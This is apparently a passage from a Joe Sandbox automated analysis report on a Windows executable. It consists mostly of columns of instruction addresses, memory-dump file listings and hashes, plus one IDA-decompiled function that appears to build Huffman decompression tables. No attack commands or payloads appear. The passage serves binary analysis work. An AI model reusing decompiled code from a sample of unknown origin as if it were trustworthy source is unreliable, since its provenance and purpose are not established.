                                  0x0040681e
                                  0x00406824
                                  0x00406829
                                  0x0040682f
                                  0x00406835
                                  0x00406837
                                  0x0040683a
                                  0x00406843
                                  0x00406849
                                  0x00406849
                                  0x0040683c
                                  0x0040683e
                                  0x00406840
                                  0x00406840
                                  0x0040684b
                                  0x00406851
                                  0x00406853
                                  0x00406856
                                  0x00406858
                                  0x0040685e
                                  0x00406860
                                  0x00406862
                                  0x00406864
                                  0x00406866
                                  0x00406869
                                  0x00406872
                                  0x00406875
                                  0x00406875
                                  0x0040686b
                                  0x0040686b
                                  0x0040686e
                                  0x0040686e
                                  0x00406869
                                  0x00406860
                                  0x00406877
                                  0x00406879
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406879
                                  0x004067f8
                                  0x004067f8
                                  0x004067fe
                                  0x00406804
                                  0x00406806
                                  0x00000000
                                  0x00000000
                                  0x00406808
                                  0x00406808
                                  0x0040680a
                                  0x0040680c
                                  0x00406815
                                  0x00406815
                                  0x0040680e
                                  0x0040680e
                                  0x00406811
                                  0x00406811
                                  0x00406817
                                  0x00406819
                                  0x00000000
                                  0x00000000
                                  0x0040687f
                                  0x0040687f
                                  0x00406884
                                  0x00406886
                                  0x00406887
                                  0x00406888
                                  0x00406889
                                  0x0040688f
                                  0x00406892
                                  0x00406895
                                  0x00406898
                                  0x0040689a
                                  0x004068a0
                                  0x004068a0
                                  0x004068a3
                                  0x004068a3
                                  0x004068a3
                                  0x004068a3
                                  0x004068ac
                                  0x00000000
                                  0x00000000
                                  0x004068b1
                                  0x004068b1
                                  0x004068b4
                                  0x004068b7
                                  0x004068b9
                                  0x00406950
                                  0x00406950
                                  0x00406953
                                  0x00406955
                                  0x00406956
                                  0x00406957
                                  0x0040695a
                                  0x00000000
                                  0x0040695a
                                  0x004068bf
                                  0x004068bf
                                  0x004068c5
                                  0x004068c7
                                  0x004068ec
                                  0x004068ef
                                  0x004068f5
                                  0x004068fa
                                  0x00406900
                                  0x00406906
                                  0x00406908
                                  0x0040690b
                                  0x00406914
                                  0x0040691a
                                  0x0040691a
                                  0x0040690d
                                  0x0040690f
                                  0x00406911
                                  0x00406911
                                  0x0040691c
                                  0x00406922
                                  0x00406924
                                  0x00406927
                                  0x00406929
                                  0x0040692f
                                  0x00406931
                                  0x00406933
                                  0x00406935
                                  0x00406937
                                  0x0040693a
                                  0x00406943
                                  0x00406946
                                  0x00406946
                                  0x0040693c
                                  0x0040693c
                                  0x0040693f
                                  0x0040693f
                                  0x0040693a
                                  0x00406931
                                  0x00406948
                                  0x0040694a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040694a
                                  0x004068c9
                                  0x004068c9
                                  0x004068cf
                                  0x004068d5
                                  0x004068d7
                                  0x00000000
                                  0x00000000
                                  0x004068d9
                                  0x004068d9
                                  0x004068db
                                  0x004068dd
                                  0x004068e4
                                  0x004068e4
                                  0x004068e6
                                  0x004068df
                                  0x004068df
                                  0x004068e1
                                  0x004068e1
                                  0x004068e8
                                  0x004068ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406962
                                  0x00406962
                                  0x00406965
                                  0x00406967
                                  0x0040696a
                                  0x0040696d
                                  0x0040696d
                                  0x0040696d
                                  0x0040696d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040601b
                                  0x00405fff
                                  0x00000000
                                  0x00406005
                                  0x00406008
                                  0x00406012
                                  0x00406015
                                  0x00406018
                                  0x00000000
                                  0x00406018
                                  0x00405fff
                                  0x00406023
                                  0x00406026
                                  0x0040602a
                                  0x00406034
                                  0x0040603e
                                  0x00406041
                                  0x00406047
                                  0x0040617b
                                  0x0040617d
                                  0x00406183
                                  0x00406186
                                  0x00406189
                                  0x00000000
                                  0x00406189
                                  0x0040604d
                                  0x0040604d
                                  0x0040604e
                                  0x004060a6
                                  0x004060a6
                                  0x004060ad
                                  0x00406153
                                  0x00406153
                                  0x00406158
                                  0x0040615b
                                  0x00406160
                                  0x00406163
                                  0x00406168
                                  0x0040616b
                                  0x00406170
                                  0x00406173
                                  0x00406173
                                  0x00000000
                                  0x004060b3
                                  0x004060b3
                                  0x004060b3
                                  0x004060b3
                                  0x004060b7
                                  0x004060b7
                                  0x004060d9
                                  0x004060dc
                                  0x004060de
                                  0x004060e1
                                  0x004060e6
                                  0x004060bc
                                  0x004060bc
                                  0x004060c1
                                  0x004060c3
                                  0x004060c5
                                  0x004060ca
                                  0x004060d0
                                  0x004060d5
                                  0x004060d7
                                  0x004060d7
                                  0x004060cc
                                  0x004060cc
                                  0x004060cc
                                  0x004060ca
                                  0x00000000
                                  0x004060e8
                                  0x00406115
                                  0x0040611a
                                  0x0040611c
                                  0x0040611d
                                  0x0040611f
                                  0x00406120
                                  0x00406120
                                  0x00406120
                                  0x00406148
                                  0x0040614d
                                  0x0040614d
                                  0x00000000
                                  0x0040614d
                                  0x004060e6
                                  0x004060ad
                                  0x00406050
                                  0x00406050
                                  0x00406051
                                  0x0040609b
                                  0x00000000
                                  0x0040609b
                                  0x00406053
                                  0x00406054
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004061b0
                                  0x004061b0
                                  0x004061b0
                                  0x004061b3
                                  0x00000000
                                  0x00000000
                                  0x00406190
                                  0x00406190
                                  0x00406194
                                  0x00000000
                                  0x00000000
                                  0x0040619a
                                  0x0040619a
                                  0x0040619d
                                  0x004061a0
                                  0x004061a5
                                  0x004061a7
                                  0x004061aa
                                  0x004061ad
                                  0x004061ad
                                  0x004061ad
                                  0x004061b5
                                  0x004061b5
                                  0x004061b8
                                  0x004061ba
                                  0x004061bf
                                  0x004061c2
                                  0x004061c4
                                  0x004061c7
                                  0x00000000
                                  0x00000000
                                  0x004061cd
                                  0x004061cd
                                  0x004061cf
                                  0x00000000
                                  0x00000000
                                  0x004061d5
                                  0x004061d5
                                  0x004061d9
                                  0x00000000
                                  0x00000000
                                  0x004061df
                                  0x004061df
                                  0x004061e2
                                  0x004061e4
                                  0x00406282
                                  0x00406282
                                  0x00406285
                                  0x00406287
                                  0x00406287
                                  0x0040628a
                                  0x0040628d
                                  0x0040628f
                                  0x00406291
                                  0x00406293
                                  0x00406293
                                  0x0040629c
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062ad
                                  0x004062ad
                                  0x004062b0
                                  0x004062b6
                                  0x004062b6
                                  0x004062bc
                                  0x004062bc
                                  0x004062bc
                                  0x00000000
                                  0x004062b0
                                  0x004061ea
                                  0x004061ea
                                  0x004061f0
                                  0x004061f3
                                  0x004061f5
                                  0x00406220
                                  0x00406223
                                  0x00406229
                                  0x0040622e
                                  0x00406234
                                  0x0040623a
                                  0x0040623c
                                  0x0040623f
                                  0x00406248
                                  0x0040624e
                                  0x0040624e
                                  0x00406241
                                  0x00406243
                                  0x00406245
                                  0x00406245
                                  0x00406250
                                  0x00406256
                                  0x00406259
                                  0x0040625b
                                  0x0040625d
                                  0x00406263
                                  0x00406265
                                  0x00406267
                                  0x0040626a
                                  0x00406273
                                  0x00406273
                                  0x00406275
                                  0x0040626c
                                  0x0040626c
                                  0x0040626f
                                  0x0040626f
                                  0x00406277
                                  0x00406277
                                  0x00406265
                                  0x0040627a
                                  0x0040627c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040627c
                                  0x004061f7
                                  0x004061f7
                                  0x004061fd
                                  0x00406203
                                  0x00406205
                                  0x00000000
                                  0x00000000
                                  0x00406207
                                  0x00406207
                                  0x00406209
                                  0x0040620b
                                  0x0040620e
                                  0x00406215
                                  0x00406215
                                  0x00406217
                                  0x00406210
                                  0x00406210
                                  0x00406212
                                  0x00406212
                                  0x00406219
                                  0x0040621b
                                  0x0040621e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406322
                                  0x00406325
                                  0x00406328
                                  0x0040632e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406505
                                  0x00406505
                                  0x00406505
                                  0x00406508
                                  0x0040650b
                                  0x0040650d
                                  0x00406510
                                  0x00406516
                                  0x0040651d
                                  0x0040651f
                                  0x00000000
                                  0x00000000
                                  0x004063f3
                                  0x004063f3
                                  0x0040641b
                                  0x0040641b
                                  0x0040641b
                                  0x0040641d
                                  0x00000000
                                  0x00000000
                                  0x004063fb
                                  0x004063fb
                                  0x004063ff
                                  0x00000000
                                  0x00000000
                                  0x00406405
                                  0x00406405
                                  0x00406408
                                  0x0040640b
                                  0x0040640e
                                  0x00406410
                                  0x00406412
                                  0x00406415
                                  0x00406418
                                  0x00406418
                                  0x00406418
                                  0x0040641f
                                  0x0040641f
                                  0x00406427
                                  0x0040642a
                                  0x00406430
                                  0x00406433
                                  0x00406437
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406459
                                  0x00406459
                                  0x0040645c
                                  0x0040646a
                                  0x0040646d
                                  0x0040645e
                                  0x0040645e
                                  0x00406460
                                  0x00406467
                                  0x00406467
                                  0x00406496
                                  0x00406496
                                  0x00406496
                                  0x00406499
                                  0x0040649b
                                  0x00000000
                                  0x00000000
                                  0x00406476
                                  0x00406476
                                  0x0040647a
                                  0x00000000
                                  0x00000000
                                  0x00406480
                                  0x00406480
                                  0x00406483
                                  0x00406486
                                  0x00406489
                                  0x0040648b
                                  0x0040648d
                                  0x00406490
                                  0x00406493
                                  0x00406493
                                  0x00406493
                                  0x0040649d
                                  0x0040649d
                                  0x0040649f
                                  0x004064a1
                                  0x004064ac
                                  0x004064af
                                  0x004064b2
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064bb
                                  0x004064be
                                  0x004064c3
                                  0x004064c6
                                  0x004064c9
                                  0x004064cc
                                  0x004064d3
                                  0x004064d6
                                  0x004064d8
                                  0x00000000
                                  0x00000000
                                  0x004064de
                                  0x004064de
                                  0x004064e2
                                  0x004064f3
                                  0x004064f3
                                  0x004064f3
                                  0x004064f5
                                  0x004064f5
                                  0x004064f9
                                  0x004064f9
                                  0x004064f9
                                  0x004064fb
                                  0x004064fc
                                  0x004064ff
                                  0x004064ff
                                  0x004064ff
                                  0x00406502
                                  0x00000000
                                  0x00406502
                                  0x004064e4
                                  0x004064e4
                                  0x004064e7
                                  0x00000000
                                  0x00000000
                                  0x004064ed
                                  0x004064ed
                                  0x00000000
                                  0x004064ed
                                  0x00406443
                                  0x00406443
                                  0x00406445
                                  0x00406447
                                  0x0040644a
                                  0x0040644d
                                  0x00406451
                                  0x00406451
                                  0x00406525
                                  0x00406525
                                  0x00406528
                                  0x0040652f
                                  0x00406533
                                  0x00406535
                                  0x00406538
                                  0x0040653b
                                  0x00406540
                                  0x00406543
                                  0x00406545
                                  0x00406546
                                  0x00406549
                                  0x00406554
                                  0x00406557
                                  0x0040656e
                                  0x00406573
                                  0x0040657a
                                  0x0040657f
                                  0x00406583
                                  0x00406585
                                  0x00406585
                                  0x00406585
                                  0x00406588
                                  0x0040658a
                                  0x00000000
                                  0x00406590
                                  0x00406590
                                  0x00406594
                                  0x0040659f
                                  0x004065b2
                                  0x004065b7
                                  0x004065bc
                                  0x004065be
                                  0x00000000
                                  0x00000000
                                  0x004065c4
                                  0x004065c4
                                  0x004065c7
                                  0x004065c9
                                  0x004065d7
                                  0x004065d7
                                  0x004065da
                                  0x004065da
                                  0x004065dd
                                  0x004065e0
                                  0x004065e3
                                  0x004065e6
                                  0x004065e9
                                  0x004065ec
                                  0x00000000
                                  0x004065ec
                                  0x004065cb
                                  0x004065cb
                                  0x004065d1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004065d1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406970
                                  0x00406970
                                  0x00406976
                                  0x0040697c
                                  0x00406981
                                  0x00406987
                                  0x0040698d
                                  0x0040698f
                                  0x00406992
                                  0x0040699b
                                  0x004069a1
                                  0x004069a1
                                  0x00406994
                                  0x00406996
                                  0x00406998
                                  0x00406998
                                  0x004069a3
                                  0x004069a5
                                  0x004069a8
                                  0x004069e3
                                  0x004069e3
                                  0x00000000
                                  0x004069aa
                                  0x004069aa
                                  0x004069aa
                                  0x004069b0
                                  0x004069b3
                                  0x004069b5
                                  0x004069ea
                                  0x004069ec
                                  0x00000000
                                  0x004069ec
                                  0x00000000
                                  0x004069b5
                                  0x00000000
                                  0x00405ff4
                                  0x004069c2
                                  0x00000000
                                  0x004069c2
                                  0x004063d6
                                  0x004063d8
                                  0x00000000
                                  0x00000000
                                  0x004063da
                                  0x004063da
                                  0x004063dd
                                  0x00000000
                                  0x004063dd
                                  0x00406322
                                  0x004062e3
                                  0x004069c7
                                  0x004069ca
                                  0x004069cc
                                  0x004069d5
                                  0x004069db
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                  • Instruction ID: 56cab3a0066612c98e3784cfed28ffc4187101fd674252aedfa605d01fc3a8fa
                                  • Opcode Fuzzy Hash: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                  • Instruction Fuzzy Hash: FEE17AB1900709DFDB24CF98C880BAABBF5EB45305F15852EE897A76D1D338AA51CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A9A Relevance: .3, Instructions: 300COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406A9A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ce38 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ce38;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ce38 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                  0x00406aa5
                                  0x00406aad
                                  0x00406ab1
                                  0x00406ab3
                                  0x00406ab6
                                  0x00406ab8
                                  0x00406ab8
                                  0x00406aba
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac3
                                  0x00406ac9
                                  0x00406ade
                                  0x00406ae6
                                  0x00406ae8
                                  0x00406aea
                                  0x00406aed
                                  0x00406aee
                                  0x00406aee
                                  0x00406af4
                                  0x00000000
                                  0x00000000
                                  0x00406af6
                                  0x00406af9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406af9
                                  0x00406afd
                                  0x00406b00
                                  0x00406b02
                                  0x00406b02
                                  0x00406b05
                                  0x00406b0b
                                  0x00406b0c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b0c
                                  0x00406b11
                                  0x00406b14
                                  0x00406b16
                                  0x00406b16
                                  0x00406b1c
                                  0x00406b1e
                                  0x00406b2f
                                  0x00406b22
                                  0x00406b26
                                  0x00406dcb
                                  0x00000000
                                  0x00406dcb
                                  0x00406b2c
                                  0x00406b2d
                                  0x00406b2d
                                  0x00406b35
                                  0x00406b38
                                  0x00406b3c
                                  0x00406b3e
                                  0x00406b40
                                  0x00406b43
                                  0x00000000
                                  0x00000000
                                  0x00406b4b
                                  0x00406b51
                                  0x00406b53
                                  0x00406b55
                                  0x00406b56
                                  0x00406b6b
                                  0x00406b6b
                                  0x00406b6e
                                  0x00406b70
                                  0x00406b70
                                  0x00406b72
                                  0x00406b77
                                  0x00406b79
                                  0x00406b80
                                  0x00406b82
                                  0x00406b8a
                                  0x00406b8a
                                  0x00406b8c
                                  0x00406b8d
                                  0x00406b9c
                                  0x00406ba0
                                  0x00406ba4
                                  0x00406ba7
                                  0x00406baa
                                  0x00406baf
                                  0x00406bb2
                                  0x00406bb8
                                  0x00406bbf
                                  0x00406bc5
                                  0x00406dbe
                                  0x00406dbe
                                  0x00406dc3
                                  0x00406dd2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406dc3
                                  0x00406bd2
                                  0x00406bd5
                                  0x00406bd8
                                  0x00406bdb
                                  0x00406bdf
                                  0x00000000
                                  0x00000000
                                  0x00406bea
                                  0x00406bed
                                  0x00406bee
                                  0x00406bf0
                                  0x00406bf6
                                  0x00406bf9
                                  0x00000000
                                  0x00000000
                                  0x00406bff
                                  0x00406c00
                                  0x00406c03
                                  0x00406c06
                                  0x00406c09
                                  0x00406c0f
                                  0x00406c11
                                  0x00406c11
                                  0x00406c19
                                  0x00406c1d
                                  0x00406c22
                                  0x00406c47
                                  0x00406c4d
                                  0x00406c4f
                                  0x00406c51
                                  0x00406c54
                                  0x00406c5d
                                  0x00000000
                                  0x00000000
                                  0x00406c24
                                  0x00406c24
                                  0x00406c2d
                                  0x00406c31
                                  0x00000000
                                  0x00000000
                                  0x00406c42
                                  0x00406c42
                                  0x00406c45
                                  0x00000000
                                  0x00000000
                                  0x00406c35
                                  0x00406c38
                                  0x00406c3a
                                  0x00406c3e
                                  0x00000000
                                  0x00000000
                                  0x00406c40
                                  0x00406c40
                                  0x00000000
                                  0x00406c42
                                  0x00406c66
                                  0x00406c6c
                                  0x00406c76
                                  0x00406c78
                                  0x00406c7d
                                  0x00406c7f
                                  0x00406cb5
                                  0x00406c81
                                  0x00406c81
                                  0x00406c84
                                  0x00406c87
                                  0x00406c91
                                  0x00406c94
                                  0x00406c9b
                                  0x00406ca6
                                  0x00406cad
                                  0x00406cad
                                  0x00406cb7
                                  0x00406cba
                                  0x00406cbc
                                  0x00406cc2
                                  0x00406cc2
                                  0x00406ccb
                                  0x00406cce
                                  0x00406cd3
                                  0x00406ce2
                                  0x00406cea
                                  0x00406cef
                                  0x00406d13
                                  0x00406d1b
                                  0x00406d1f
                                  0x00406d25
                                  0x00406cf1
                                  0x00406cff
                                  0x00406d02
                                  0x00406d08
                                  0x00406d08
                                  0x00406d29
                                  0x00406ce4
                                  0x00406ce4
                                  0x00406ce4
                                  0x00406d3a
                                  0x00406d3e
                                  0x00406d4a
                                  0x00406d45
                                  0x00406d48
                                  0x00406d48
                                  0x00406d52
                                  0x00406d57
                                  0x00406d5f
                                  0x00406d5b
                                  0x00406d5d
                                  0x00406d5d
                                  0x00406d65
                                  0x00406d67
                                  0x00406d6e
                                  0x00406d78
                                  0x00406d82
                                  0x00406d9e
                                  0x00406da2
                                  0x00406be7
                                  0x00406bed
                                  0x00406bee
                                  0x00406bf0
                                  0x00406bf6
                                  0x00406bf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406d84
                                  0x00406d84
                                  0x00406d84
                                  0x00406d89
                                  0x00406d92
                                  0x00406d9b
                                  0x00000000
                                  0x00406d9b
                                  0x00406da8
                                  0x00406da8
                                  0x00406dab
                                  0x00406db2
                                  0x00406db5
                                  0x00000000
                                  0x00406bd8
                                  0x00406b58
                                  0x00406b5a
                                  0x00406b5a
                                  0x00406b5e
                                  0x00406b61
                                  0x00406b62
                                  0x00406b62
                                  0x00000000
                                  0x00406b5a
                                  0x00406ace
                                  0x00406ad4
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
                                  • Instruction ID: 2cd64b44fdb598fc6d7be2f0130c20f4249908d1a9472bfe36cd3babe412fd90
                                  • Opcode Fuzzy Hash: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
                                  • Instruction Fuzzy Hash: F7C15C71A00219CBDF14CF64C4905EDB7B2FF99314F26826AD856BB384D734A952CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403FF1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
